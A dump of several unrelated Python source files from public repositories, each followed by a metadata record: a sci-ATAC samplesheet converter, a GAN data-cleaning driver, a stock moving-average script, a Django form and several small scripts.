Also, this is PCR for which there is a single plate=1.\n # first well\n row1 = mobj.group( 3 )\n col1 = int( mobj.group( 4 ) )\n row2 = row1\n col2 = col1\n if( col1 < 1 or col1 > 12 ):\n print( 'Error: bad well: \'%s\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n if( mobj.group( 5 ) ):\n # second well, if this is a range\n row2 = mobj.group( 8 )\n col2 = int( mobj.group( 9 ) )\n across_row_first = False # p5\n index1 = well_to_index( 1, row1, col1, across_row_first, [ None, None ] )\n index2 = well_to_index( 1, row2, col2, across_row_first, [ None, None ] )\n\n for well_index in range( index1, index2 + 1 ):\n well = index_to_well( well_index - 1, across_row_first )\n p5_samplesheet_row_list.append( well )\n\n p7_samplesheet_row_list = []\n for value_range in samplesheet_row[p7_samplesheet_col].split( ',' ):\n value_range = re.sub( r'\s', '', value_range )\n mobj = re.match( r'([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?)([-:]([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?))?$', value_range )\n if( not mobj ):\n print( 'Error: bad well or well range \'%s\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n\n # Assume that the well-range strings were checked earlier in parse_wells() call so\n # those tests are omitted here. Also, this is PCR for which there is a single plate=1.\n # first well\n row1 = mobj.group( 3 )\n col1 = int( mobj.group( 4 ) )\n row2 = row1\n col2 = col1\n if( col1 < 1 or col1 > 12 ):\n print( 'Error: bad well: \'%s\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n if( mobj.group( 5 ) ):\n # second well, if this is a range\n row2 = mobj.group( 8 )\n col2 = int( mobj.group( 9 ) )\n across_row_first = True # p7\n index1 = well_to_index( 1, row1, col1, across_row_first, [ None, None ] )\n index2 = well_to_index( 1, row2, col2, across_row_first, [ None, None ] )\n\n for well_index in range( index1, index2 + 1 ):\n well = index_to_well( well_index - 1, across_row_first )\n p7_samplesheet_row_list.append( well )\n\n pair_samplesheet_row_list.append( [ p5_samplesheet_row_list, p7_samplesheet_row_list ] )\n\n pair_list_dict = {}\n for pair_samplesheet_row in pair_samplesheet_row_list:\n key = '_'.join( pair_samplesheet_row[0] ) + '_' + '_'.join( pair_samplesheet_row[1] )\n pair_list_dict.setdefault( key, pair_samplesheet_row )\n\n p5_well_list = []\n p7_well_list = []\n for key in pair_list_dict.keys():\n p5_well_list.extend( pair_list_dict[key][0] )\n p7_well_list.extend( pair_list_dict[key][1] )\n\n return( p5_well_list, p7_well_list )\n\n\ndef write_samplesheet_json_format( file, column_name_list, samplesheet_row_list, row_out_list, wrap_groups_dict, level = 3, number_wells = 384, tn5_barcodes = False, use_all_barcodes = False, illumina_run_directory = 'NA' ):\n \"\"\"\n Write an output samplesheet file in JSON format.\n \"\"\"\n # Store input samplesheet for reference if questions arise.\n input_samplesheet_rows = []\n for samplesheet_row in samplesheet_row_list:\n input_samplesheet_rows.append( ','.join( '\"{0}\"'.format( e ) for e in samplesheet_row ) )\n\n # Store sample information for processing pipeline.\n sample_index_list = []\n for row_out in row_out_list:\n sample_index_list.append( { 'sample_id' : row_out['sample_name'],\n 'ranges' : ':'.join( [ make_index_string( row_out['n7_index_list'] ),\n make_index_string( row_out['p7_index_list'] ),\n make_index_string( row_out['p5_index_list'] ),\n make_index_string( row_out['n5_index_list'] ) ] ),\n 'genome' : row_out['genome'],\n 'peak_group' : row_out['peak_group'],\n 
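# editor's note: 'ranges' above packs the four index strings in fixed N7:P7:P5:N5 order\n 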
'peak_file' : row_out['peak_file'] })\n\n # Store information for dashboard(s).\n\n # Note: assume that the header was checked for consistent\n # p5 => columns and p7 => rows\n pcr_format = None\n for icol, column_name_dict in enumerate( column_name_list ):\n if( column_name_dict['type'] == 'p5' ):\n if( column_name_dict['format'] == 'columns' ):\n pcr_format = 'row_col'\n elif( column_name_dict['format'] == 'indexes' ):\n pcr_format = 'indexes'\n elif( column_name_dict['format'] == 'wells' ):\n pcr_format = 'wells'\n\n # PCR rows and columns specified?\n p5_col_list = None\n p7_row_list = None\n if( pcr_format == 'row_col' ):\n p5_col_list, p7_row_list = get_pcr_row_col( column_name_list, samplesheet_row_list )\n\n # PCR wells specified?\n p5_well_list = None\n p7_well_list = None\n if( pcr_format == 'wells' ):\n p5_well_list, p7_well_list = get_pcr_wells( column_name_list, samplesheet_row_list ) \n\n # JSON structure.\n sample_data = { 'json_file_version' : json_file_version,\n 'illumina_run_directory' : illumina_run_directory,\n 'level' : level,\n 'number_wells' : number_wells,\n 'tn5_barcodes' : tn5_barcodes,\n 'use_all_barcodes' : use_all_barcodes,\n 'input_samplesheet_rows' : input_samplesheet_rows,\n 'pcr_format': pcr_format,\n 'p5_col_list' : p5_col_list,\n 'p7_row_list' : p7_row_list,\n 'p5_well_list' : p5_well_list,\n 'p7_well_list' : p7_well_list,\n 'sample_index_list' : sample_index_list,\n 'wrap_groups_dict': wrap_groups_dict,\n }\n file.write(json.dumps(sample_data, indent=4))\n\n return( 0 )\n\n\n#\n# Count distinct well indexes.\n#\ndef count_wells( index_list ):\n num_well = len( set( index_list ) )\n return( num_well )\n\n\n#\n# Gather wrap group information. That is, the\n# wrap group names, if they are given in the\n# input samplesheet file, and the samples that belong\n# to them.\n#\ndef get_wrap_groups( row_out_list ):\n wrap_groups_dict = {}\n for irow, row_out in enumerate(row_out_list):\n # Gather wrap_group values in wrap_groups_dict.\n # Does this sample have a wrap group value?\n if( row_out.get( 'wrap_group' ) != None and row_out['wrap_group'] != '' ):\n if( wrap_groups_dict.get( row_out['wrap_group'] ) == None ):\n wrap_groups_dict[row_out['wrap_group']] = [ row_out['sample_name'] ]\n elif( row_out['sample_name'] not in wrap_groups_dict[row_out['wrap_group']] ):\n wrap_groups_dict[row_out['wrap_group']].append( row_out['sample_name'] )\n return( wrap_groups_dict )\n\n\n\ndef samplesheet_report( samplesheet_row_list, row_out_list, wrap_groups_dict, args ):\n print()\n print( '== Samplesheet information ==' )\n print( ' Tn5 barcodes: %r' % ( args.tn5_barcodes ) )\n print( ' Level: %s' % ( args.level ) )\n print( ' Number of wells: %d' % ( args.number_wells ) )\n print( ' Sample identifier: %s' % ( args.sample_identifier ) )\n print( ' Use all barcodes: %r' % ( args.use_all_barcodes ) )\n\n print( ' Sample names after converting unacceptable characters to \\'.\\':' )\n for irow, row_out in enumerate(row_out_list):\n if(irow > 0 and row_out_list[irow]['sample_name'] == row_out_list[irow-1]['sample_name']):\n continue\n print( ' %s' % ( row_out['sample_name'] ) )\n\n print( ' Sample well counts:' )\n max_len_samplename = 0\n for row_out in row_out_list:\n if( len( row_out['sample_name'] ) > max_len_samplename ):\n max_len_samplename = len( row_out['sample_name'] )\n if( len( 'name' ) > max_len_samplename ):\n max_len_samplename = len( 'name' )\n print( ' name%s N7 P7 P5 N5' % ( ' ' * ( max_len_samplename - len( 'name' ) ) ) )\n\n for irow, row_out in 
enumerate(row_out_list):\n if(irow > 0\n and row_out_list[irow]['sample_name'] == row_out_list[irow-1]['sample_name']\n and count_wells(row_out_list[irow]['n7_index_list']) == count_wells(row_out_list[irow-1]['n7_index_list'])\n and count_wells(row_out_list[irow]['p7_index_list']) == count_wells(row_out_list[irow-1]['p7_index_list'])\n and count_wells(row_out_list[irow]['p5_index_list']) == count_wells(row_out_list[irow-1]['p5_index_list'])\n and count_wells(row_out_list[irow]['n5_index_list']) == count_wells(row_out_list[irow-1]['n5_index_list'])):\n continue\n\n print( ' %s%s %d %d %d %d' % ( row_out['sample_name'],\n ' ' * ( max_len_samplename - len( row_out['sample_name'] ) ),\n count_wells( row_out['n7_index_list'] ),\n count_wells( row_out['p7_index_list'] ),\n count_wells( row_out['p5_index_list'] ),\n count_wells( row_out['n5_index_list'] ) ) )\n print( ' Sample peak groups and files:' )\n max_len_peak_group = 0\n max_len_genome = 0\n for row_out in row_out_list:\n if( len( row_out['peak_group'] ) > max_len_peak_group ):\n max_len_peak_group = len( row_out['peak_group'] )\n if( len( row_out['genome'] ) > max_len_genome ):\n max_len_genome = len( row_out['genome'] )\n if( len( 'peak_group' ) > max_len_peak_group ):\n max_len_peak_group = len( 'peak_group' )\n if( len( 'genome' ) > max_len_genome ):\n max_len_genome = len( 'genome' )\n print( ' name%s genome%s peak_group%s peak_file' % ( ' ' * ( max_len_samplename - len( 'name' ) ), ' ' * ( max_len_genome - len( 'genome' ) ), ' ' * ( max_len_peak_group - len( 'peak_group' ) ) ) )\n for irow, row_out in enumerate(row_out_list):\n if(irow > 0\n and row_out_list[irow]['sample_name'] == row_out_list[irow-1]['sample_name'] \n and row_out_list[irow]['genome'] == row_out_list[irow-1]['genome']\n and row_out_list[irow]['peak_group'] == row_out_list[irow-1]['peak_group']\n and row_out_list[irow]['peak_file'] == row_out_list[irow-1]['peak_file']):\n continue\n\n print( ' %s%s %s%s %s%s %s' % ( row_out['sample_name'],\n ' ' * ( max_len_samplename - len( row_out['sample_name'] ) ),\n row_out['genome'],\n ' ' * ( max_len_genome - len( row_out['genome'] ) ),\n row_out['peak_group'],\n ' ' * ( max_len_peak_group - len( row_out['peak_group'] ) ),\n row_out['peak_file'] ) )\n\n # Report information about wrap groups for the wrapping,\n # if it exists in the input samplesheet file.\n if( len( wrap_groups_dict.keys() ) > 0 ):\n print( ' Distribution groups:' )\n for wrap_group in wrap_groups_dict.keys():\n print( ' Group: %s' % ( wrap_group ) )\n print( ' Samples:' )\n for sample_name in wrap_groups_dict[wrap_group]:\n print( ' %s' % ( sample_name ) )\n\n print( ' Illumina run directory: %s' % ( args.run_dir ) )\n print( ' Run sciatac_samplesheet.py -d for more information.' 
)\n return( 0 )\n\n\ndef write_samplesheet_template():\n filename = 'samplesheet.template.csv'\n with open( filename, 'wt' ) as fp:\n print( 'n7_wells,p7_rows,p5_columns,n5_wells,sample_name,genome', file=fp )\n print( 'p1:A01-p1:H12,a-d,5-8,p1:a01-p1:h01,sample1,barnyard', file=fp )\n return( 0 )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='A program to convert sci-ATAC CSV samplesheet to pipeline samplesheet.')\n parser.add_argument('-i', '--input', required=False, default=None, help='Input CSV samplesheet filename (required string).')\n parser.add_argument('-o', '--output', required=False, default=None, help='Output samplesheet filename (required string).')\n parser.add_argument('-f', '--format', required=False, choices=[ 'json', 'index'], default='json', help='Output file format (default: \\'%(default)s\\') (optional string).')\n parser.add_argument('-r', '--run_dir', required=False, default=None, help='Illumina run directory path (optional string).')\n parser.add_argument('-l', '--level', type=int, required=False, choices=[ 2, 3 ], default=3, help='Two or three level sci-ATAC-seq experiment (default: %(default)s) (optional integer).')\n parser.add_argument('-w', '--number_wells', type=int, required=False, choices=[ 96, 384 ], default=384, help='Number of barcode set wells (default: %(default)s) (optional integer).')\n parser.add_argument('-t', '--tn5_barcodes', required=False, action='store_true', help='Tn5 has barcodes (optional flag).')\n parser.add_argument('-s', '--sample_identifier', required=False, choices=[ 'n5', 'n7' ], default='n5', help='Ligation barcode that identifies the sample (default: \\'%(default)s\\') used to check for duplicates (optional string).')\n parser.add_argument('--use_all_barcodes', required=False, action='store_true', help='Use all barcodes to demultiplex fastq files. By default, uninformative barcodes are not used to identify samples when demultiplexing fastq files (optional flag).')\n parser.add_argument('--no_expand_pcr_rows_columns', required=False, action='store_true', help='Without --no_expand_pcr_rows_columns, this program pairs the i-th P7 row with the i-th P5 column for each sample. 
With --no_expand_pcr_rows_columns, all combinations of P7 rows and P5 columns are used for each sample.')\n parser.add_argument('-e', '--template', required=False, action='store_true', help='Write template samplesheet file (\\'samplesheet.template.csv\\') with standard column formats and exit (optional flag).')\n parser.add_argument('-d', '--documentation', required=False, action='store_true', help='Display documentation and exit (optional flag).')\n parser.add_argument('-v', '--version', required=False, action='store_true', help='Give program and JSON output file versions and exit (optional flag).')\n args = parser.parse_args()\n\n # Write documentation.\n if( args.documentation ):\n display_documentation()\n sys.exit( 0 )\n\n # Write versions.\n if( args.version ):\n print( 'Program version: %s' % ( program_version ) )\n print( 'JSON output file version: %s' % ( json_file_version ) )\n sys.exit( 0 )\n\n # Write samplesheet template file.\n if( args.template ):\n write_samplesheet_template()\n sys.exit( 0 )\n\n # Check for required command line parameters.\n error_string = ''\n if( args.input == None ):\n error_string += ' input filename parameter: -i or --input \\n'\n if( args.output == None ):\n error_string += ' output filename parameter: -o or --output \\n'\n if( len( error_string ) > 0 ):\n print( 'Error: missing command line parameters\\n%s' % ( error_string ) )\n print( 'For help run \\'sciatac_samplesheet.py -h\\' or \\'sciatac_samplesheet.py -d\\'' )\n sys.exit( -1 )\n\n #\n # Check command line parameter consistency.\n #\n check_args( args )\n\n # Go to work.\n filename_in = args.input\n filename_out = args.output\n\n column_name_list, samplesheet_row_list = read_samplesheet( open( filename_in, newline='' ) )\n samplesheet_row_list = check_sample_names( column_name_list, samplesheet_row_list )\n check_genome_names( column_name_list, samplesheet_row_list )\n check_peak_groups( column_name_list, samplesheet_row_list )\n check_peak_files( column_name_list, samplesheet_row_list )\n check_peak_spec( column_name_list, samplesheet_row_list )\n check_wrap_group( column_name_list, samplesheet_row_list )\n\n if(not args.no_expand_pcr_rows_columns):\n samplesheet_row_list = expand_sample_rows(column_name_list, samplesheet_row_list)\n\n row_out_list = make_samplesheet_indexes( column_name_list, samplesheet_row_list )\n check_sample_identifier( row_out_list, args.sample_identifier )\n wrap_groups_dict = get_wrap_groups( row_out_list )\n if( args.format == 'json' ):\n write_samplesheet_json_format( open( filename_out, 'w' ), column_name_list, samplesheet_row_list, row_out_list, wrap_groups_dict, level = args.level, number_wells = args.number_wells, tn5_barcodes = args.tn5_barcodes, use_all_barcodes = args.use_all_barcodes, illumina_run_directory = args.run_dir )\n else:\n write_samplesheet_index_format( open( filename_out, 'w' ), row_out_list )\n samplesheet_report( samplesheet_row_list, row_out_list, wrap_groups_dict, args )\n # diagnostic dump\n # dump_row_out_list( row_out_list )\n\n","repo_name":"bbi-lab/bbi-sciatac-demux","sub_path":"samplesheet/sciatac_samplesheet.py","file_name":"sciatac_samplesheet.py","file_ext":"py","file_size_in_byte":72274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"19286167223","text":"import os\nimport json\nimport traceback\nfrom pathlib import Path\nimport time\n\nfrom SeqGAN.train import Trainer\nfrom eva import evaluate\nfrom att_reverse import att_reverse\nfrom rule_sample import 
rule_sample\nimport config\n\n\n# To use the setup with Kubernetes, read the datasets name from an environment variable.\ndataset = os.environ.get('DATASET', 'DATASET_not_set')\n\n# Otherwise, you can set the dataset name manually here.\n# dataset = '184_simple_mcar_1'\n\npath = f\"{dataset}_copy\"\npath_ori = dataset\npath_dirty = f\"{dataset}_dirty\"\n\n\n# Paths\nmodels_path = Path('models/')\nmodels_base_path = models_path / dataset\npath_rules = models_base_path / \"rules.txt\"\n\nmodels_base_path.mkdir(parents=True, exist_ok=True)\ng_pre_weights_path = models_base_path / 'generator_pre.hdf5'\nd_pre_weights_path = models_base_path / 'discriminator_pre.hdf5'\ng_weights_path = models_base_path / 'generator.pkl'\nd_weights_path = models_base_path / 'discriminator.hdf5'\npath_neg = models_base_path / 'generated_sentences.txt'\n\n# Create these files\nfor file in [g_pre_weights_path, d_pre_weights_path, g_weights_path, d_weights_path, path_neg]:\n file.touch(exist_ok=True)\n\norder = config.order # Order, 1 for positive order, 0 for negative order\n\ntry:\n for order in [1, 0]: # Changed by Philipp: Run GARF in positive and negative order once each.\n att_reverse(path, order, models_base_path)\n if config.flag == 0 or config.flag == 2: # 0 for training SeqGAN, 1 for repairing part, 2 for doing it simultaneously\n trainer = Trainer(order,\n config.batch_size,\n config.max_length,\n config.g_e,\n config.g_h,\n config.d_e,\n config.d_h,\n config.d_dropout,\n config.generate_samples,\n path_pos=path,\n path_neg=str(path_neg),\n path_rules=path_rules,\n g_lr=config.g_lr,\n d_lr=config.d_lr,\n n_sample=config.n_sample,\n models_base_path=models_base_path)\n\n trainer.pre_train(g_epochs=config.g_pre_epochs,\n d_epochs=config.d_pre_epochs,\n g_pre_path=str(g_pre_weights_path),\n d_pre_path=str(d_pre_weights_path),\n g_lr=config.g_pre_lr,\n d_lr=config.d_pre_lr)\n\n trainer.load_pre_train(g_pre_weights_path, d_pre_weights_path)\n trainer.reflect_pre_train() # Mapping layer weights to agent\n\n trainer.train(steps=1,\n g_steps=1,\n head=10,\n g_weights_path=g_weights_path,\n d_weights_path=d_weights_path)\n\n trainer.save(g_weights_path, d_weights_path)\n\n if config.flag == 1 or config.flag == 2:\n trainer = Trainer(order,\n 1,\n config.max_length,\n config.g_e,\n config.g_h,\n config.d_e,\n config.d_h,\n config.d_dropout,\n config.generate_samples,\n path_pos=path,\n path_neg=str(path_neg),\n g_lr=config.g_lr,\n d_lr=config.d_lr,\n n_sample=config.n_sample,\n path_rules=path_rules,\n models_base_path=models_base_path)\n trainer.load(g_weights_path, d_weights_path)\n\n rule_len = rule_sample(path_rules, path, order)\n trainer.train_rules(rule_len, path_rules) # For production rules, generate rules_final.txt from rules.txt\n trainer.filter(path)\n\n att_reverse(path, 1, models_base_path)\n trainer.repair(path)\n evaluate(path_ori, path, path_dirty)\n\nexcept Exception as e:\n exception_type = str(type(e).__name__)\n exception_message = str(e)\n exception_traceback = traceback.format_exc()\n\n # Create a dictionary to store the exception information\n exception_data = {\n \"dataset\": path_ori,\n \"exception_type\": exception_type,\n \"exception_message\": exception_message,\n \"exception_traceback\": exception_traceback\n }\n\n # Convert the dictionary to a JSON string\n json_data = json.dumps(exception_data, indent=4)\n\n # Write the JSON string to a text file\n timestamp = str(time.time_ns())\n with open(f'output/{path_ori}_{timestamp}.txt', 'wt') as file:\n file.write(json_data)\n print('Did not 
clean data successfully:')\n    print(f'{exception_type}: {exception_message}')\n\n\n","repo_name":"philipp-jung/mirmir","sub_path":"benchmarks/garf/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"32230175599","text":"import yfinance as yf\nimport average_Stock_excel\nimport datetime\nfrom openpyxl import load_workbook\nimport getpass\n\ndef findAndWrite():\n    stock_list = average_Stock_excel.read_stock()\n    code_list = average_Stock_excel.read_code()\n\n    # Get the user name of the current machine\n    userName = getpass.getuser()\n\n    # Build the OneDrive path\n    path1 = \"C:/Users/\"\n    path2 = \"/OneDrive/AI_List.xlsx\"\n\n    path = path1 + str(userName) + path2\n    load_wb = load_workbook(path, data_only=True)\n    load_sheet = load_wb['평균선']\n\n    # Get the dates\n    today = datetime.datetime.now()\n    start_day = today - datetime.timedelta(days=+1)\n\n    # Convert the date format (this part differs from the krx Python script)\n    today = today.strftime(\"%Y-%m-%d\")\n    start_day = start_day.strftime(\"%Y-%m-%d\")\n    # Record the date the program was run\n    load_sheet.cell(3, 2).value = str(today)\n\n    # Excel logging starts from row 11\n    i = 11\n\n    for code in code_list:\n        print(code)\n        data = yf.Ticker(code)\n        # Fetch only the closing prices of this ticker for the given period\n        # Valid periods: 1d,5d,1mo,3mo,6mo,1y,2y,5y,10y,ytd,max\n        hist = data.history(period=\"1y\")[['Close']]\n\n        # Get the closing price of the most recent date\n        hist1 = hist.tail(1)\n        recent_price_2 = hist1.values.tolist()\n        recent_price_3 = sum(recent_price_2, [])\n        recent_price = recent_price_3[0]\n\n        # Compute the 5-day average\n        # The fetched data is stacked with the most recent rows at the bottom\n        # -> so take only the last 5 rows\n        hist5 = hist.tail(5)\n        # The fetched data is a DataFrame, so convert it to a list for calculation\n        hist_list = hist5.values.tolist()\n        # Oddly it comes back as a 2-D list, so flatten it to 1-D\n        hist_list = sum(hist_list, [])\n        average5 = round(sum(hist_list) / 5, 2)\n\n        # Compute the 20-day average\n        hist20 = hist.tail(20)\n        hist_list = hist20.values.tolist()\n        hist_list = sum(hist_list, [])\n        average20 = round(sum(hist_list) / 20, 2)\n\n        # Compute the 60-day average\n        hist60 = hist.tail(60)\n        hist_list = hist60.values.tolist()\n        hist_list = sum(hist_list, [])\n        average60 = round(sum(hist_list) / 60, 2)\n\n        # Compute the 120-day average\n        hist120 = hist.tail(120)\n        hist_list = hist120.values.tolist()\n        hist_list = sum(hist_list, [])\n        average120 = round(sum(hist_list) / 120, 2)\n\n        # print(average5)\n        # print(average20)\n        # print(average60)\n        # print(average120)\n\n        # Compare the most recent close against each moving-average value\n        text = \"\"\n        result = 0\n        # Below the 120-day line & above the 5-day line\n        if average120 > recent_price > average5:\n            text = \"120일 보다 낮음 & 5일 위\"\n            result = round((recent_price - average120) / average120 * 100, 1)\n        # Below the 120-day average\n        elif recent_price < average120:\n            text = \"120일 보다 낮음\"\n            result = round((recent_price - average120) / average120 * 100, 1)\n        # Below the 60-day line & above the 5-day line\n        elif average60 > recent_price > average5:\n            text = \"60일 보다 낮음 & 5일 위\"\n            result = round((recent_price - average60) / average60 * 100, 1)\n        # Below the 60-day average\n        elif recent_price < average60:\n            text = \"60일 보다 낮음\"\n            result = round((recent_price - average60) / average60 * 100, 1)\n        # Below the 20-day line & above the 5-day line\n        elif average20 > recent_price > average5:\n            text = \"20일 보다 낮음 & 5일 위\"\n            result = round((recent_price - average20) / average20 * 100, 1)\n        # Below the 20-day average\n        elif recent_price < average20:\n            text = \"20일 보다 낮음\"\n            result = round((recent_price - average20) / average20 * 100, 1)\n        # Below the 5-day average\n        elif recent_price < average5:\n            text = \"5일 보다 낮음\"\n            result = round((recent_price - average5) / average5 * 100, 1)\n        else:\n            text = \"\"\n            
result = \"\"\n\n average_Stock_excel.write_excel(i, average5, average20, average60, average120, text, result)\n\n i += 1\n\n\n\n\n\n\n","repo_name":"mmol93/yahooFinance","sub_path":"average_Stock.py","file_name":"average_Stock.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"4494634699","text":"def main():\n N = int(input())\n lis = [list(map(int, input().split())) for _ in range(N)]\n option_num = 3\n DP = [[0] * option_num for _ in range(N)]\n DP[0] = lis[0]\n for i in range(1, N):\n # 各要素に対して、前と同一の要素以外との足し合わせで最大値を取る。\n for j in range(3):\n for k in range(3):\n if j == k:\n continue\n DP[i][j] = max(DP[i-1][k] + lis[i][j], DP[i][j])\n\n return max(DP[N-1])\n\n\nprint(main())\n","repo_name":"masa08/algorithm_and_data_structure","sub_path":"atcoder/edpc/vacation.py","file_name":"vacation.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"23938947238","text":"import logging\nfrom .pull_params import pull_params\n\ndef insert_sample_analyst(cur, yml_dict, csv_template, uploader):\n \"\"\"\n \"\"\"\n \n params = ['contactid']\n inputs = pull_params(params, yml_dict, csv_template, 'ndb.sampleanalysts')\n get_contact = \"\"\"SELECT * FROM ndb.contacts WHERE contactname %% %(contactname)s;\"\"\"\n \n contids = []\n baseid = 1\n for i in inputs['contactid']:\n cur.execute(get_contact, {'contactname': i})\n contids.append({'contactname': i, 'id': cur.fetchone()[0], 'order': baseid})\n baseid = baseid + 1\n \n result = []\n counter = 0\n for i in range(len(uploader['samples'])):\n for contact in contids:\n inserter = \"\"\"\n SELECT ts.insertsampleanalyst(_sampleid := %(sampleid)s,\n _contactid := %(contactid)s,\n _analystorder := %(analystorder)s)\n \"\"\"\n cur.execute(inserter, {'sampleid': int(uploader['samples'][counter]), \n 'contactid': int(contact['id']),\n 'analystorder': int(contact['order'])})\n result.append(cur.fetchone()[0])\n counter += 1\n\n return result","repo_name":"NeotomaDB/DataBUS","sub_path":"neotomaUploader/insert_sample_analyst.py","file_name":"insert_sample_analyst.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"40142229558","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport scipy.stats\n\nfrom SimulationPython.Simulation.Util import Util\n\na = 10\nD = 2\nt = 4\n\ndef propa(z0, z1):\n return 1/a + (2/a)*np.sum([np.exp(-n**2 * np.pi**2 *D*t/a**2)*np.cos(n*np.pi*z0/a)*np.cos(n*np.pi*z1/a) for n in range(1, 11)], axis=0)\n\n#points = np.linspace(0, a, 500)\n#plt.plot(points, propa(0, points))\n#plt.show()\n\nzNumber = 100000\n\ndisp = np.empty(zNumber)\n\nfor i in range(zNumber):\n z0 = Util.getRandomU(a) + a/2 ###########\n next = False\n while not(next):\n z1 = Util.getRandomU(a) + a/2\n proba = propa(z0, z1)\n assert proba <= 1\n if random.random() < proba:\n disp[i] = z1 - z0\n next = True\n\nbw = 2*scipy.stats.iqr(disp, rng=(25, 75))/(len(disp))**(1/3)\nnBins = int((np.max(disp) - np.min(disp))/bw)\nplt.hist(disp, bins=nBins, density = True, stacked=True)\nplt.show()\n\ndef signal(q):\n return np.transpose(np.abs( np.average(np.exp(1j*np.matmul(np.transpose(np.matrix(disp)), np.matrix(q))), axis=0) ))\n\ntheoretical = Util.getSignal_plane_fin(a, D, t, 10)\nqPoints = np.linspace(0, 1.5, 101)[1:]\nplt.plot(qPoints, 
signal(qPoints))\nplt.plot(qPoints, theoretical(qPoints), color=\"red\")\nplt.yscale(\"log\")\nplt.show()\n\n","repo_name":"LouisNewmanRGB/MFE","sub_path":"SimulationPython/_propagator_sampling.py","file_name":"_propagator_sampling.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"34260270175","text":"from django import forms\nfrom .models import Post,Post_Comment\nPOSITION_CHOICES=[\n ('개발', '개발'),\n ('디자인','디자인'),\n ('기획','기획'),\n]\nclass PostForm(forms.ModelForm):\n title = forms.CharField(\n widget=forms.TextInput(\n attrs={'placeholder': '제목 입력',\n 'class' : 'form-control',\n }, \n ),\n )\n\n content = forms.CharField(\n label='내용',\n widget=forms.Textarea(\n attrs={'class': 'form-control'},\n ),\n )\n \n category = forms.ChoiceField( \n required=True,\n # attrs={'required': True}\n widget=forms.RadioSelect, \n choices=POSITION_CHOICES,\n )\n\n class Meta:\n model = Post\n fields = ('title','content','category',)\n\nclass PostCommentForm(forms.ModelForm):\n class Meta:\n model = Post_Comment\n fields = ('content',)","repo_name":"rabBit64/django-pairprj2","sub_path":"posts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"21467980419","text":"'''print(\"***The values below are odd numbers***\")\nfor odd_numbers in range(1,101):\n if(odd_numbers%2 != 0):\n print(odd_numbers)\n\nprint(\"***The values below are even numbers***\")\nfor even_numbers in range(1,101):\n if(even_numbers%2 == 0):\n print(even_numbers)\n'''\nS = 1\nE = 100\nfor num in range(S, E+1):\n if num>1:\n for i in range(2,num):\n if(num % i==0):\n break\n else:\n print(num, end=\" \")","repo_name":"samaraorega/Inspire-Youth-In-STEM-2","sub_path":"Week2/odd_even.py","file_name":"odd_even.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"44346492423","text":"from conf.configuration import *\nimport pandas as pd\nimport csv\nfrom utils import *\ndef read_file(file_path):\n file = open(file_path,'r',encoding='utf-8',errors=\"ignore\")\n lines =[]\n for line in file:\n l = line.replace('\\n','').replace('\\t','')\n lines.append(l)\n return \" \".join(lines)\n\ndef load_topics():\n path_topics=get_path_preprocessed_topics('ibm-debater-claim-evidence-acl')\n df_topics=pd.read_csv(path_topics,sep=\",\",encoding=\"utf-8\")\n return df_topics\n\ndef generate_document_topic(df_documents):\n path_evidence=get_path_source_part('ibm-debater-claim-evidence-acl', 'evidence')\n df_topics=load_topics()\n df_evidence=pd.read_csv(path_evidence,sep=\",\",encoding=\"utf-8\")\n df_evidence=df_evidence[['Topic','Article']]\n df_evidence.drop_duplicates(['Topic','Article'],inplace=True)\n df_evidence.rename(columns={'Topic':'topic','Article':'topic-key'},inplace=True)\n df_documents=df_documents.merge(df_evidence,on='topic-key')\n\n df_documents=df_documents.merge(df_topics,on='topic')\n #df_documents=df_documents[['topic-id','document','document-id']]\n return df_documents\n\ndef preprocess():\n path_corpus_ascii = get_path_source_part(\"ibm-debater-claim-evidence-acl\", \"documents\")\n path_preprocessed_documents = get_path_preprocessed_documents('ibm-debater-claim-evidence-acl')\n path_document_topic=get_path_document_topic('ibm-debater-claim-evidence-acl')\n for root,dirs,files in 
os.walk(path_corpus_ascii):\n documents = []\n for file_name in files:\n file_path = os.path.join(root,file_name)\n file_content = read_file(file_path)\n documents.append(file_content)\n topic_keys=[file.replace('_',' ') for file in files]\n df_documents = pd.DataFrame({\"document\":documents,\"document-id\":files,'topic-key':topic_keys})\n\n df_documents['document']=df_documents.apply((lambda row: drop_separator(row['document'],\"\\\",\\\"\")),axis=1)\n df_documents.to_csv(path_preprocessed_documents,quotechar='\"',sep=\",\",quoting=csv.QUOTE_ALL,encoding=\"utf-8\",\\\n columns=['document-id','document'],index=False)\n df_document_topic=generate_document_topic(df_documents)\n df_document_topic.to_csv(path_document_topic,quotechar='\"',sep=\",\",quoting=csv.QUOTE_ALL,encoding=\"utf-8\", \\\n columns=['document-id','topic-id'],index=False)\n return documents,files\n\ndef extract_topics():\n path_topics=get_path_preprocessed_topics('ibm-debater-claim-evidence-acl')\n path_evidence=get_path_source_part('ibm-debater-claim-evidence-acl', 'evidence')\n df_evidence=pd.read_csv(path_evidence,sep=\",\",encoding=\"utf-8\")\n df_topics=df_evidence[['Topic']]\n df_topics=df_topics.drop_duplicates(['Topic'])\n df_topics.rename(columns={'Topic':'topic'},inplace=True)\n 